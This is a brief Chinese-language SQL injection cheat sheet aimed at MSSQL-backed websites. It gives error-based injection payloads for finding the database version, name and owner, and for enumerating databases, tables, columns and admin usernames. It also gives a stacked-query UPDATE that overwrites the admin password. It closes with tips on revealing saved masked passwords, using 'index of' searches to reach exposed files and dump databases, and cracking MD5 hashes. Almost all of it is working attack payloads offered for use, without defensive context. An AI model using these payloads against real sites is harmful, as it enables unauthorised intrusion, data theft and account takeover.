在url 中id=?的地方判断注入点,再根据漏洞进行注入
在url 中id=?的地方判断注入点,再根据漏洞进行注入
and user>0 无法转换 报错 能得到我们想知道的
and @@version>0 判断版本号
and db_name()数据库名
and user>0所有者
库名.所有者.表名
获取所有数据库名(通过更改dbid号依次获取,7以上的是用户数据库)
select 1,name,null,4,5,6,7,8,9,10,11,null,13
from+master.dbo.sysdatabases+where+dbid=7--
and (select name from master.dbo.sysdatabases where dbid=6) >1表名:and (select top 1 name from xxx.xxx.sysobjects where xtype='u' and status>0)>0
列:
and (select top 1 col_name(object_id('admin'),1) from sysobjects)>0
值:
and (select username from admin)>0
加;可以执行多条语句
改密码:;update 库名.所有者.表名 set password='*******' where username='admin';--
星号密码克星 林格斯翻译-》可用于查看保存在本地的星号密码和登录界面的记住密码
目录遍历用搜索引擎的index of /pass index of /qq.txt等可以越权进入网站 拖数据库
网站的url中的ID,user,pass等如用md5加密可以破解 www.xmd5.com www.cmd5.com